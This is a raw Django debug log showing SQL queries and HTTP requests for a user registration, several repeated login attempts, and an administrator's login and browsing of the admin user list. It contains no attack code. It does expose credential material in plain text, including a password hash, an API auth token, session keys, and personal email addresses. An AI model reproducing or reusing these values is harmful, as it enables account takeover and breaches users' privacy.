200 1946 [29/Nov/2019 08:37:49] "OPTIONS /api/register HTTP/1.0" 200 187 DEBUG 2019-11-29 08:37:49,414 utils 26999 140702605727488 (0.003) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert' LIMIT 1; args=('webexpert',) DEBUG 2019-11-29 08:37:49,415 utils 26999 140702605727488 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'webexpert987@gmail.com' LIMIT 1; args=('webexpert987@gmail.com',) DEBUG 2019-11-29 08:37:49,644 utils 26999 140702605727488 (0.002) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$BXz0VnTTRSYl$8VK0PvBgeFfiyp9ucL3pH/VzT00KRIQMaCx3oXVVsAE=', NULL, false, 'webexpert', '', '', 'webexpert987@gmail.com', false, true, '2019-11-29T08:37:49.421421+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$BXz0VnTTRSYl$8VK0PvBgeFfiyp9ucL3pH/VzT00KRIQMaCx3oXVVsAE=', None, False, 'webexpert', '', '', 'webexpert987@gmail.com', False, True, datetime.datetime(2019, 11, 29, 8, 37, 49, 421421, tzinfo=)) DEBUG 2019-11-29 08:37:49,659 utils 26999 140702605727488 (0.002) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('f440cf80a684612b766238436d5e9fa114f31296', 5, '2019-11-29T08:37:49.657508+00:00'::timestamptz); args=('f440cf80a684612b766238436d5e9fa114f31296', 5, datetime.datetime(2019, 11, 29, 8, 37, 49, 657508, tzinfo=)) [29/Nov/2019 08:37:49] "POST /api/register HTTP/1.0" 201 115 DEBUG 2019-11-29 08:38:32,583 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:38:32.574818+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 38, 32, 574818, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:38:32,586 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert'; args=('webexpert',) DEBUG 2019-11-29 08:38:32,821 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:38:32.820006+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 38, 32, 820006, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:38:32] "POST /login/?next=/ HTTP/1.0" 200 1951 DEBUG 2019-11-29 08:38:59,983 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:38:59.974560+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 38, 59, 974560, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:38:59,986 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert'; args=('webexpert',) DEBUG 2019-11-29 08:39:00,226 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:39:00.224119+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 39, 0, 224119, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:39:00] "POST /login/?next=/ HTTP/1.0" 200 1951 DEBUG 2019-11-29 08:39:22,945 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:39:22.937062+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 39, 22, 937062, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:39:22,949 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert'; args=('webexpert',) DEBUG 2019-11-29 08:39:23,194 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:39:23.192825+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 39, 23, 192825, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:39:23] "POST /login/?next=/ HTTP/1.0" 200 1951 Not Found: /favicon.ico [29/Nov/2019 08:39:24] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-11-29 08:39:29,983 utils 26999 140702605727488 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:39:29.970205+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 39, 29, 970205, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:39:29,987 utils 26999 140702605727488 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert'; args=('webexpert',) DEBUG 2019-11-29 08:39:30,227 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:39:30.224723+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 39, 30, 224723, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:39:30] "POST /login/?next=/ HTTP/1.0" 200 1951 DEBUG 2019-11-29 08:39:40,306 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:39:40.295200+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 39, 40, 295200, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:39:40,311 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert'; args=('webexpert',) DEBUG 2019-11-29 08:39:40,573 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:39:40.572040+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 39, 40, 572040, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:39:40] "POST /login/?next=/ HTTP/1.0" 200 1951 DEBUG 2019-11-29 08:39:46,995 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T08:39:46.984835+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 8, 39, 46, 984835, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 08:39:46,999 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webexpert'; args=('webexpert',) DEBUG 2019-11-29 08:39:47,261 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T08:39:47.259591+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 8, 39, 47, 259591, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 08:39:47] "POST /login/?next=/ HTTP/1.0" 200 1951 [29/Nov/2019 08:41:17] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:46:25] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:51:28] "GET / HTTP/1.0" 302 0 [29/Nov/2019 08:56:36] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:01:00] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:01:37] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:06:48] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:11:55] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:17:03] "GET / HTTP/1.0" 302 0 [29/Nov/2019 09:22:08] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 09:26:22,464 utils 26999 140702605727488 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:26:22.451021+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 9, 26, 22, 451021, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 09:26:22,470 utils 26999 140702605727488 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'webteam.ace@gmail.com'; args=('webteam.ace@gmail.com',) DEBUG 2019-11-29 09:26:22,776 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T09:26:22.774156+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 9, 26, 22, 774156, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [29/Nov/2019 09:26:22] "POST /login/?next=/ HTTP/1.0" 200 1963 DEBUG 2019-11-29 09:26:30,035 utils 26999 140702605727488 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:26:30.026337+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 29, 9, 26, 30, 26337, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-29 09:26:30,038 utils 26999 140702605727488 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'resfx-admin'; args=('resfx-admin',) DEBUG 2019-11-29 09:26:30,257 utils 26999 140702605727488 (0.001) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m' LIMIT 1; args=('d7pf9z12rq486ubfvq2gsrikii6tex3m',) DEBUG 2019-11-29 09:26:30,258 utils 26999 140702605727488 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d7pf9z12rq486ubfvq2gsrikii6tex3m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-13T09:26:30.257466+00:00'::timestamptz); args=('d7pf9z12rq486ubfvq2gsrikii6tex3m', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 9, 26, 30, 257466, tzinfo=)) DEBUG 2019-11-29 09:26:30,260 utils 26999 140702605727488 (0.000) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('jk4izkus8ndogt7adrfvz69jqgeqx6jc',) DEBUG 2019-11-29 09:26:30,262 utils 26999 140702605727488 (0.001) DELETE FROM "django_session" WHERE "django_session"."session_key" IN ('jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=('jk4izkus8ndogt7adrfvz69jqgeqx6jc',) DEBUG 2019-11-29 09:26:30,264 utils 26999 140702605727488 (0.001) UPDATE "auth_user" SET "last_login" = '2019-11-29T09:26:30.262813+00:00'::timestamptz WHERE "auth_user"."id" = 6; args=(datetime.datetime(2019, 11, 29, 9, 26, 30, 262813, tzinfo=), 6) DEBUG 2019-11-29 09:26:30,267 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:26:30.266402+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 26, 30, 266402, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 09:26:30] "POST /login/?next=/ HTTP/1.0" 302 0 DEBUG 2019-11-29 09:26:30,775 utils 26999 140702605727488 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:26:30.762314+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 9, 26, 30, 762314, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 09:26:30,779 utils 26999 140702605727488 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 09:26:30,822 utils 26999 140702605727488 (0.005) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-11-29 09:26:30,826 utils 26999 140702605727488 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:26:30.824187+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 26, 30, 824187, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 09:26:30] "GET / HTTP/1.0" 200 6019 [29/Nov/2019 09:26:31] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [29/Nov/2019 09:26:31] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [29/Nov/2019 09:26:31] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 Not Found: /favicon.ico [29/Nov/2019 09:26:34] "GET /favicon.ico HTTP/1.0" 404 6411 DEBUG 2019-11-29 09:27:07,424 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:27:07.415449+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 9, 27, 7, 415449, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 09:27:07,426 utils 26999 140702522537728 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-11-29 09:27:07,429 utils 26999 140702522537728 (0.001) SELECT "auth_group"."id", "auth_group"."name" FROM "auth_group" ORDER BY "auth_group"."name" ASC; args=() DEBUG 2019-11-29 09:27:07,431 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 09:27:07,432 utils 26999 140702522537728 (0.000) SELECT COUNT(*) AS "__count" FROM "auth_user"; args=() DEBUG 2019-11-29 09:27:07,436 utils 26999 140702522537728 (0.000) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" ORDER BY "auth_user"."username" ASC; args=() DEBUG 2019-11-29 09:27:07,563 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-13T09:27:07.560661+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 13, 9, 27, 7, 560661, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [29/Nov/2019 09:27:07] "GET /auth/user/ HTTP/1.0" 200 8687 [29/Nov/2019 09:27:08] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-11-29 09:27:08,033 utils 26999 140702605727488 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:27:08.018821+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 11, 29, 9, 27, 8, 18821, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-11-29 09:27:08,038 utils 26999 140702605727488 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [29/Nov/2019 09:27:08] "GET /jsi18n/ HTTP/1.0" 200 3223 [29/Nov/2019 09:27:08] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [29/Nov/2019 09:27:08] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [29/Nov/2019 09:27:08] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [29/Nov/2019 09:27:08] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [29/Nov/2019 09:27:08] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [29/Nov/2019 09:27:08] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [29/Nov/2019 09:27:08] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [29/Nov/2019 09:27:08] "GET /static/admin/img/search.svg HTTP/1.0" 200 458 [29/Nov/2019 09:27:08] "GET /static/admin/img/icon-no.svg HTTP/1.0" 200 560 [29/Nov/2019 09:27:08] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [29/Nov/2019 09:27:08] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 [29/Nov/2019 09:27:10] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 [29/Nov/2019 09:27:10] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 [29/Nov/2019 09:27:15] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 09:28:02,293 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:02.285119+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 9, 28, 2, 285119, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 09:28:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 09:28:02,590 utils 26999 140702522537728 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:02.581473+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 9, 28, 2, 581473, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-29 09:28:02,619 utils 26999 140702522537728 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-13T09:28:02.616793+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 13, 9, 28, 2, 616793, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [29/Nov/2019 09:28:02] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-29 09:28:03,050 utils 26999 140702522537728 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-29T09:28:03.039042+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 29, 9, 28, 3, 39042, 